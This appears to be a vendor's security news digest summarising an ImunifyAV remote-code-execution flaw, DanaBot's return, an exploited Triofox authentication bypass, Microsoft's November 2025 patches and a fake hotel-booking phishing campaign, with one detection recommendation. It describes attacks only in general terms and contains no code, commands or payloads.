Critical ImunifyAV flaw exposes millions of Linux-hosted sites to RCE
The ImunifyAV malware scanner (part of Imunify360) used on shared Linux hosting environments contains a critical remote-code-execution vulnerability in its AI-Bolit deobfuscation component, allowing execution of dangerous PHP functions.
The issue affects versions prior to 32.7.4.0, and CloudLinux has released patches; older versions of ImunifyAV, ImunifyAV+, and Imunify360 are all impacted.
Because ImunifyAV is deployed by hosting providers at the server level (not just per website), a successful exploit could lead to full server compromise, especially if the scanner is running with elevated privileges.
DanaBot resurfaces, resumes Windows infections after six-month shutdown
The DanaBot banking trojan has resurfaced in the wild with a new version 669, roughly six months after law enforcement’s “Operation Endgame” had disrupted its infrastructure.
The rebuilt command-and-control infrastructure now includes both Tor (.onion) domains and back-connect nodes, making it more resilient and harder to block.
Threat actors are using the updated DanaBot to steal browser-stored credentials, perform form-grabs, and potentially facilitate remote access; new cryptocurrency wallets (BTC, ETH, LTC, TRX) have been identified for stolen funds.
Attackers exploit Triofox antivirus feature to deploy remote access tools
Security researchers discovered that attackers exploited a critical vulnerability (CVE-2025-12480) in Triofox’s administrative interface, bypassing authentication by spoofing “localhost” in HTTP Host headers.
By abusing Triofox’s built-in antivirus feature, attackers uploaded a malicious script that runs with SYSTEM-level privileges as the AV scanner, enabling remote-code execution.
In their post-exploitation chain, the attackers deployed Zoho UEMS, Zoho Assist and AnyDesk; they also used Plink and PuTTY to tunnel SSH traffic and enable lateral movement.
Use Acronis EDR process-behavior monitoring to detect and block unexpected SYSTEM-level AV-scanner launches, especially when paired with network tunneling tools like PuTTY or SSH.
Microsoft patches zero day and 63 vulnerabilities in November Patch Tuesday update
Microsoft released its November 2025 security update, patching 63 vulnerabilities, including one actively exploited zero-day (CVE-2025-62215) in the Windows Kernel.
The update also addresses 16 remote-code-execution (RCE) flaws, four “Critical” vulnerabilities, 29 elevation-of-privilege issues, information disclosure bugs, and more.
The zero-day (CVE-2025-62215) is linked to a race-condition in the Windows Kernel, allowing local attackers with limited privileges to escalate to SYSTEM-level access.
Mass phishing campaign targets hotel bookings with 4,300 fake sites
A sophisticated phishing campaign by a Russian-speaking threat actor created over 4,300 fake travel booking websites, impersonating brands like Booking.com, Expedia, Agoda, Airbnb and more.
The phishing kit customizes the fraudulent site appearance based on unique URL parameters, presenting a realistic hotel booking flow to victims, complete with fake CAPTCHA and Cloudflare-like loading screens.
When victims enter credit card details, the site processes the data, then shows a 3-D Secure “verification” widget to capture expiration dates and CVV, all while exfiltrating their payment information.
